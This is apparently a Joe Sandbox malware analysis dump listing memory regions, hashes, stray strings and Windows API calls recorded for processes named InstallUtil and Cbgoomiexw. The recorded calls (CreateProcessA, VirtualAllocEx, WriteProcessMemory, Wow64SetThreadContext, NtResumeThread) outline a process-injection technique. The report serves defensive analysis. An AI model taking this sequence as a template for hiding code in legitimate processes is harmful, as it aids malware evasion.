                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0aa53dabfb744eefc5cf6e001d22e5458098229a863ba630ed98dbf0c6be27f3
                                          • Instruction ID: 3aabcc84104a17cd0bd47e5200c0464e5684c422e983695d8a61af11ef462fcb
                                          • Opcode Fuzzy Hash: 0aa53dabfb744eefc5cf6e001d22e5458098229a863ba630ed98dbf0c6be27f3
                                          • Instruction Fuzzy Hash: D2319871E0060A9BDB06DFA8D9507AEFBB2BFC9308F14D519E405E7385DBB09846CB51
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53828c8f366427165c5df035cfd07092bb0a7c1fcfed529088cc87f7c0c26b98
                                          • Instruction ID: dfe4a84af836ca65cafff5f931de3637184ee3d193efdaf5582bf131c2a3929a
                                          • Opcode Fuzzy Hash: 53828c8f366427165c5df035cfd07092bb0a7c1fcfed529088cc87f7c0c26b98
                                          • Instruction Fuzzy Hash: 8D217E31B00249CFDB25EB7CC4256EE7BF5AF89208F2004A9D106EB750DB359C12CB90
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfad7e154ff987a42fb61d45803376b9af5fa30c6c467406bf136248a22666e3
                                          • Instruction ID: 36fb08198bf71efa11620ebfa3d664e8431a8b78135a3e28b94f2e708d6daf00
                                          • Opcode Fuzzy Hash: dfad7e154ff987a42fb61d45803376b9af5fa30c6c467406bf136248a22666e3
                                          • Instruction Fuzzy Hash: C9217330E0060A9BDB05DFA9D8506AEBBB2BFC9308F14D519E405EB391DBB09846CB51
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80640dd350c51b227b662a37e62b8d9477ec364bbed8e96654d03ace5498ae14
                                          • Instruction ID: e2624365bc776b282e0f21f390d7c6b2952fce5162ea8d3f30db64ba6fa5ef53
                                          • Opcode Fuzzy Hash: 80640dd350c51b227b662a37e62b8d9477ec364bbed8e96654d03ace5498ae14
                                          • Instruction Fuzzy Hash: C621F4746003568FDB23F7ACE894B693B65FB4131DF104D66E44AC716ADA20C8878B92
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c952043ff44d7678d88afb4de43dd5786d97bc7d306eeb91e0e219d9ae8565d
                                          • Instruction ID: 7f7de627f2e462c9605ca225de2d7dca990f1150e20040653fce24f3e3b51291
                                          • Opcode Fuzzy Hash: 6c952043ff44d7678d88afb4de43dd5786d97bc7d306eeb91e0e219d9ae8565d
                                          • Instruction Fuzzy Hash: A721A435E007099BCB19DFA8D454AEEB7B2BFC9308F14856AE815B7381DB709846CB41
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

                                          Execution Graph

                                          Execution Coverage:12.1%
                                          Dynamic/Decrypted Code Coverage:98%
                                          Signature Coverage:0%
                                          Total number of Nodes:508
                                          Total number of Limit Nodes:51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                          • API String ID: 0-312445597
                                          • Opcode ID: c78ed7a2865001d895882ef8d28f4a7f5cb8838ab7834c81c03ffa2b10e32c27
                                          • Instruction ID: 99c1d4d5ae419e60c76578762eeaa85a20a937ba73b17e73f0b8614a63a08593
                                          • Opcode Fuzzy Hash: c78ed7a2865001d895882ef8d28f4a7f5cb8838ab7834c81c03ffa2b10e32c27
                                          • Instruction Fuzzy Hash: EAB22C74A00228CFDB54DFA4C884BADB7B6BF48700F158599E509AB3A5DB70ED85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                          • API String ID: 0-2546334966
                                          • Opcode ID: 479bc4ad0dd233708f80c105901c0e89935db041cbeb826ff8fa297e56a6b131
                                          • Instruction ID: a4a5d7142e7197f2c8aafc92d7fe322cb51c61d9d457234358c077fd54a43ab7
                                          • Opcode Fuzzy Hash: 479bc4ad0dd233708f80c105901c0e89935db041cbeb826ff8fa297e56a6b131
                                          • Instruction Fuzzy Hash: F3220B34A00229CFDB64DF64C984BADB7B2BF48305F159199E509AB3A5DB30ED85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 82f6d0f653827c47716b43141f6fbb3b3d0c739101d6294188bcee98c1dfe12d
                                          • Instruction ID: 57795808e9efa2bd959f7e6a5021b44ae90b6430f15b310e0965cc9fa8b32c28
                                          • Opcode Fuzzy Hash: 82f6d0f653827c47716b43141f6fbb3b3d0c739101d6294188bcee98c1dfe12d
                                          • Instruction Fuzzy Hash: D7F1F874E05228CFEBA4CF69D844BA9B7F6BF49300F1091AAE50DAB654D7705985CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 26325b64ef6caeea649d180d19bd4a178dde99dff0d44feba3be72de74b6b8b4
                                          • Instruction ID: 93cebeb5068efd14d848fa566f9a6ea822c33bb77eb04cd943448c6e175aff72
                                          • Opcode Fuzzy Hash: 26325b64ef6caeea649d180d19bd4a178dde99dff0d44feba3be72de74b6b8b4
                                          • Instruction Fuzzy Hash: F3F1F674E05228CFEBA4CF69D844B99BBF2FF49300F1091AAE509AB654DB705A85CF50
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063024B9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: e068b9750d96462348de7e85f99442cd215f99ba3d305a3f31bec47c1b750ef8
                                          • Instruction ID: 16443c8d40d2897d0390154ff0d3fd23f92cdba28cecb425a09a2e9d185cbeea
                                          • Opcode Fuzzy Hash: e068b9750d96462348de7e85f99442cd215f99ba3d305a3f31bec47c1b750ef8
                                          • Instruction Fuzzy Hash: 502102B59013499FCB10DFAAD884ADEFBF5FF48310F20842AE559A3240C775AA45CBA5
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063024B9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 822a60eb443b48bf4bdfc4e87d094d5abb0838dadca5c3895e2a4a5b11fae7ee
                                          • Instruction ID: af53345dd564eae63f51684ee7c4e976b15f8eafae76f3f51f79ae276a37cd81
                                          • Opcode Fuzzy Hash: 822a60eb443b48bf4bdfc4e87d094d5abb0838dadca5c3895e2a4a5b11fae7ee
                                          • Instruction Fuzzy Hash: 462116B1D003099FCB10DFAAD884ADEFBF5FF48310F20842AE519A3240C7759904CBA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0630358E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 1f9c224afb9733b51bdcb3c4cf74e22315aa8327ee4b8c5ffe3980f5f3a82bf1
                                          • Instruction ID: ada149cdb82274d0dc556e252984cdf740252e2c8fc49ccc445690bae36461e3
                                          • Opcode Fuzzy Hash: 1f9c224afb9733b51bdcb3c4cf74e22315aa8327ee4b8c5ffe3980f5f3a82bf1
                                          • Instruction Fuzzy Hash: 382106B5D043498FDB10DFAAC4456AEFBF4EF88320F14842ED459A7250CB78A945CFA5
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0630358E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 8cdfd31e3e6b4a47828483f488666102907b073be2c931a62554ad7966753d72
                                          • Instruction ID: 1e8c174a54c47caad987c84c60e890782176a72181cf1ec2b46b83fc705e27bf
                                          • Opcode Fuzzy Hash: 8cdfd31e3e6b4a47828483f488666102907b073be2c931a62554ad7966753d72
                                          • Instruction Fuzzy Hash: 7C11E4B5D003098FDB10DFAAC485A9FFBF4EF88324F10842AD459A7250CB78A945CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Deq
                                          • API String ID: 0-948982800
                                          • Opcode ID: 35e6532e69b96e7d52cce2e7c6eee1ce93385f65fa6e3be5021e031f04fba179
                                          • Instruction ID: 0c371f1c58619b54f3561730bb1c2ace55b3ec78bff158f71a6b17646aa6b3c2
                                          • Opcode Fuzzy Hash: 35e6532e69b96e7d52cce2e7c6eee1ce93385f65fa6e3be5021e031f04fba179
                                          • Instruction Fuzzy Hash: 8FD1B474E00218CFDB54DFA9D994A9DBBF2BF88300F1081A9D419AB369DB31AD85CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 5f806fa7868750d5077d843aa28e2733092275e14ae70f4a6875161e5508b432
                                          • Instruction ID: be5c5ce04ae4d78c97d2d929ad4ed5cffb5ee67c40ad7684adafe97de0fa9840
                                          • Opcode Fuzzy Hash: 5f806fa7868750d5077d843aa28e2733092275e14ae70f4a6875161e5508b432
                                          • Instruction Fuzzy Hash: 99F2E170D09398EFDB56DBB4CC59BAE7FB5AF0A301F05409AE141EB292C7745844CB62

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $^q$$^q
                                          • API String ID: 0-355816377
                                          • Opcode ID: 5d602687a8813c5425edb62694587e0f13e15f93edeeb71530fc0b30224b55e6
                                          • Instruction ID: cff0e32c18bc8756a2f1076085ba5fe6436223d0cb3b8692cec7d8cc3bc95ec9
                                          • Opcode Fuzzy Hash: 5d602687a8813c5425edb62694587e0f13e15f93edeeb71530fc0b30224b55e6
                                          • Instruction Fuzzy Hash: 19126034E00229CFDB55DFA4D854AADBBF2FF48701F148116E816AB398DB38A945CF91

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: f5892a3fff9a476c9603d61ccbf3d23c3b167afb60c6eaba2430eb05c2fc4fce
                                          • Instruction ID: aa7ea9d7fa0c8ea2e31587b99be287854f8d2a436dc69906c5729f93d2554e79
                                          • Opcode Fuzzy Hash: f5892a3fff9a476c9603d61ccbf3d23c3b167afb60c6eaba2430eb05c2fc4fce
                                          • Instruction Fuzzy Hash: 8BF1E174E01318EFCB98DFA5E4896ACBBB2FF49316F20846AE416A7354DB305985CF10

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 51c07522d5208bde7c39211643c0df6f9d3b6bdba4a24ef9fdb0be2772581b75
                                          • Instruction ID: ab596d0544388ecd3d639f125bc388ad8562b3559c80bd051f4da9306cd6f261
                                          • Opcode Fuzzy Hash: 51c07522d5208bde7c39211643c0df6f9d3b6bdba4a24ef9fdb0be2772581b75
                                          • Instruction Fuzzy Hash: 37A1F274E00218DFDB89DFA5D449AEDBBB2FF88301F14846AD912B7294CB745982CF90

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq$Hbq
                                          • API String ID: 0-4081012451
                                          • Opcode ID: 97da24cf9d45d0f2c20a4bddf93f0450e1585accb9d0275cf78ca5e9ff3f669a
                                          • Instruction ID: fc1e9cf19cfe6c6d8d1ce5d5dbe3890f5032e18e19644088cf99aaf24052f173
                                          • Opcode Fuzzy Hash: 97da24cf9d45d0f2c20a4bddf93f0450e1585accb9d0275cf78ca5e9ff3f669a
                                          • Instruction Fuzzy Hash: 92517A34B002148FC799AF38C45462EBBF3AF99711B1484ADE50A9B3A5CF35ED46CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5$h
                                          • API String ID: 0-1868625573
                                          • Opcode ID: ffe96ad15f91bcf603c5b90a8183b5e7f14df9393cf047bad89b79b7cc20dda9
                                          • Instruction ID: b8ecc88c5343eb2b50734cc28893c2113c4f86908d6002a1eca346f3e9042386
                                          • Opcode Fuzzy Hash: ffe96ad15f91bcf603c5b90a8183b5e7f14df9393cf047bad89b79b7cc20dda9
                                          • Instruction Fuzzy Hash: F821A2B4D142288FDBA4DF28C89479ABBB6BB48305F4041EAD64EA7250DB309E84CF45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_^q
                                          • API String ID: 0-538443824
                                          • Opcode ID: 507924de27970a662d20affc1f1bd7ed53ba5b92a52696b4295606cb5e932488
                                          • Instruction ID: 8937cf5e10dd9b7b0288bc21b57812e786331a0cb416f767d149d3092eb6d820
                                          • Opcode Fuzzy Hash: 507924de27970a662d20affc1f1bd7ed53ba5b92a52696b4295606cb5e932488
                                          • Instruction Fuzzy Hash: 78229C35E002249FDB44DFA9D494A6DBBF2BF88310F548069E905AB3A5CB71ED84CF90
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06302D2A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3a30bba12fb7c72d3970ddac9a04a635285d8fb787c95f0e61f625b8c854a932
                                          • Instruction ID: 80939e5a4fc41f28355226a9a9831f11dd36fce0912289574ffa080df53bfa44
                                          • Opcode Fuzzy Hash: 3a30bba12fb7c72d3970ddac9a04a635285d8fb787c95f0e61f625b8c854a932
                                          • Instruction Fuzzy Hash: 27815771D006599FEB50CFA9C8957DEBBF1FF48310F14852AE858A7280D7749989CF81
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06302D2A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AA06
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06303400
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06303400
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06302ECE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063037D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D056,?,?,?,?,?), ref: 0260D117
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D056,?,?,?,?,?), ref: 0260D117
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06302ECE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063037D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063032DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0260931D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063032DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0260931D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AA06
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pbq
                                          • API String ID: 0-3896149868
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl^q
                                          • API String ID: 0-2831078282
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p<^q
                                          • API String ID: 0-1680888324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *
                                          • API String ID: 0-163128923
                                          Strings
                                          Memory Dump Source
